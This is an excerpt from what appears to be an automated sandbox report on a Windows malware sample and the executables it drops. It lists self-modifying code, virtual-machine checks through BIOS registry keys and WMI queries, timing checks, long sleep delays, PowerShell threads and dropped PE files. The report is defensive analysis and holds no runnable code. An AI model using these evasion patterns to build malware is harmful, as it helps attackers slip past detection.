Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Special instruction interceptor: First address: 61FC0D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Special instruction interceptor: First address: 473AA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Special instruction interceptor: First address: 4739FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Special instruction interceptor: First address: 64B68F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Special instruction interceptor: First address: 6AD456 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Special instruction interceptor: First address: 62A6DC instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Memory allocated: 2C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Memory allocated: 4EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Memory allocated: 51D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Memory allocated: 5600000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Memory allocated: 5300000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_04D40CD3 rdtsc

0_2_04D40CD3

Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 595224
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 595001
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594764
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594544
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594178
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593967
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593763
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593611
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593463
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593307
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592307
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592145
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591885
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1018	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1079	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1136	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1098	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1086	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1081	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window / User API: threadDelayed 1019
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window / User API: threadDelayed 807
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window / User API: threadDelayed 885
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window / User API: threadDelayed 1046
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window / User API: threadDelayed 1034
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window / User API: threadDelayed 959
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window / User API: threadDelayed 916
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window / User API: threadDelayed 735
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3776
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 905
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window / User API: threadDelayed 1220
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window / User API: threadDelayed 1228
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window / User API: threadDelayed 1148
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window / User API: threadDelayed 1212
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window / User API: threadDelayed 1231
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window / User API: threadDelayed 1225
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window / User API: threadDelayed 1312
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7475
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4685

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1072566001\a4377b3e83.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[5].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1072562001\fbf74eb9d4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1072565001\e6710ad235.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1072561001\c6de8b12c0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1072558001\7251e9a205.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1072560001\6ebe63e8d0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1072559001\85abde4902.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1072557001\318ea12e54.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3448	Thread sleep count: 1018 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3448	Thread sleep time: -2037018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8188	Thread sleep count: 1079 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8188	Thread sleep time: -2159079s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2492	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8168	Thread sleep count: 214 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8168	Thread sleep time: -6420000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8180	Thread sleep count: 1136 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8180	Thread sleep time: -2273136s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5960	Thread sleep count: 1098 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5960	Thread sleep time: -2197098s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184	Thread sleep count: 1086 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184	Thread sleep time: -2173086s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2144	Thread sleep count: 1125 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2144	Thread sleep time: -2251125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3632	Thread sleep count: 1081 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3632	Thread sleep time: -2163081s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 7320	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 6548	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 7680	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe TID: 8000	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe TID: 8132	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 4556	Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 4556	Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 8148	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 8148	Thread sleep time: -78039s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 5212	Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 5212	Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 5196	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 5196	Thread sleep time: -78039s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 6096	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 7940	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 6160	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 5124	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 5124	Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 2164	Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 2164	Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 5168	Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 5168	Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe TID: 6164	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 5572	Thread sleep time: -2039019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 5856	Thread sleep time: -1614807s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 736	Thread sleep time: -1770885s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 1720	Thread sleep time: -2093046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 2032	Thread sleep time: -2069034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 6480	Thread sleep time: -52000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 4544	Thread sleep time: -1918959s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 5324	Thread sleep time: -1832916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 2424	Thread sleep time: -1470735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe TID: 3808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe TID: 7112	Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe TID: 7112	Thread sleep time: -318000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 6844	Thread sleep count: 1220 > 30
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 6844	Thread sleep time: -2441220s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 6944	Thread sleep count: 1228 > 30
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 6944	Thread sleep time: -2457228s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 7408	Thread sleep time: -52000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 6908	Thread sleep count: 1148 > 30
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 6908	Thread sleep time: -2297148s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 3660	Thread sleep count: 1212 > 30
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 3660	Thread sleep time: -2425212s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 6976	Thread sleep count: 1231 > 30
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 6976	Thread sleep time: -2463231s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 7044	Thread sleep count: 1225 > 30
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 7044	Thread sleep time: -2451225s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 5624	Thread sleep count: 1312 > 30
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe TID: 5624	Thread sleep time: -2625312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe TID: 7564	Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe TID: 7568	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe TID: 7400	Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe TID: 7572	Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe TID: 4248	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe TID: 7560	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe TID: 7576	Thread sleep time: -36018s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228	Thread sleep count: 7475 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4420	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe TID: 3684	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe TID: 7060	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360	Thread sleep count: 4685 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -595224s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -595001s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -594764s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -594544s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -594388s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -594178s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -593967s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -593763s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -593611s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -593463s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -593307s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -593025s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -592307s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -592145s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668	Thread sleep time: -591885s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe

File opened: PHYSICALDRIVE0

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\random.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: 9_2_00406301 FindFirstFileW,FindClose,		9_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: 9_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		9_2_00406CC7

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 595224
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 595001
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594764
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594544
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594178
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593967
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593763
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593611
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593463
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593307
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 593025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592307
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592145
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591885
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\764661
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\764661\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\

